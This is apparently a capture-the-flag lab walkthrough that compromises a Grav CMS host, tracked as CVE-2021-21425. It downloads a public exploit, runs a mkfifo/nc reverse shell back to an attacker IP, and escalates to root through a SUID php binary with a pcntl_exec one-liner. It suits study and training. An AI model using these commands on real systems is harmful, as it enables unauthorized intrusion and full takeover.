Astronaut - RCE CVE

When testing default credentials we see that we have gained access to the admin login page.

We proceed by searching for unauthenticated Grav CMS exploits and as seen below, we see a few CVEs.

One of the google results leads us to the following exploit:

Reference: https://github.com/CsEnox/CVE-2021-21425/blob/main/exploit.py

We download the exploit to our attack machine using wget.

┌──(root㉿kali)-[/home/kali/ugc/gravity] └─# wget "https://raw.githubusercontent.com/CsEnox/CVE-2021-21425/main/exploit.py" --2022-08-17 09:25:28-- https://raw.githubusercontent.com/CsEnox/CVE-2021-21425/main/exploit.py Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 185.199.111.133, 185.199.110.133, 185.199.109.133, ... Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|185.199.111.133|:443... connected. HTTP request sent, awaiting response... 200 OK Length: 1892 (1.8K) [text/plain] Saving to: ‘exploit.py’

exploit.py 100%[============================================================>] 1.85K --.-KB/s in 0s

2022-08-17 09:25:29 (13.7 MB/s) - ‘exploit.py’ saved [1892/1892] Now we use the exploit to ping our attack machine.

┌──(root㉿kali)-[/home/kali/ugc/gravity] └─# python3 exploit.py -c 'ping -c1 192.168.145.128' -t http://192.168.145.160/grav-admin [] Creating File Scheduled task created for file creation, wait one minute [] Running file Scheduled task created for command, wait one minute After approximately 1 minute, we recieve the ping packets.

┌──(root㉿kali)-[/home/kali] └─# tcpdump -i eth0 icmp tcpdump: verbose output suppressed, use -v[v]... for full protocol decode listening on eth0, link-type EN10MB (Ethernet), snapshot length 262144 bytes 09:41:01.440075 IP 192.168.145.160 > 192.168.145.128: ICMP echo request, id 2, seq 1, length 64 09:41:01.440111 IP 192.168.145.128 > 192.168.145.160: ICMP echo reply, id 2, seq 1, length 64 Now we will proceed by attempting get a reverse shell.

We setup a listener on our attack machine.

┌──(root㉿kali)-[/home/kali] └─# nc -lvnp 4444 Now we update our command as seen below.

┌──(root㉿kali)-[/home/kali/ugc/gravity] └─# python3 exploit.py -c 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 192.168.145.128 4444 >/tmp/f' -t http://192.168.145.160/grav-admin [] Creating File Scheduled task created for file creation, wait one minute [] Running file Scheduled task created for command, wait one minute We receive a response in our listener as www-data.

┌──(root㉿kali)-[/home/kali] └─# nc -lvnp 4444 listening on [any] 4444 ... connect to [192.168.145.128] from (UNKNOWN) [192.168.145.160] 40906 sh: 0: can't access tty; job control turned off $ whoami www-data Privilege Escalation We search for any interesting SUID binaries and see /usr/bin/php7.4 in the output.

www-data@gravity:~/html/grav-admin$ find / -perm -u=s -type f 2>/dev/null | grep -v 'snap' /usr/lib/eject/dmcrypt-get-device /usr/lib/openssh/ssh-keysign /usr/lib/dbus-1.0/dbus-daemon-launch-helper /usr/lib/policykit-1/polkit-agent-helper-1 /usr/bin/chfn /usr/bin/at /usr/bin/php7.4 /usr/bin/sudo /usr/bin/gpasswd /usr/bin/passwd /usr/bin/mount /usr/bin/chsh /usr/bin/fusermount /usr/bin/umount /usr/bin/newgrp /usr/bin/su Using https://gtfobins.github.io/, we see an entry for PHP and follow the listed steps in order to obtain root access.

www-data@gravity:~/html/grav-admin$ php -r "pcntl_exec('/bin/sh', ['-p']);"

whoami

root

ip a

1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: ens33: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000
link/ether 00:0c:29:1d:44:e8 brd ff:ff:ff:ff:ff:ff
inet 192.168.145.160/24 brd 192.168.145.255 scope global dynamic ens33
valid_lft 1304sec preferred_lft 1304sec
inet6 fe80::20c:29ff:fe1d:44e8/64 scope link
valid_lft forever preferred_lft forever

hostname

gravity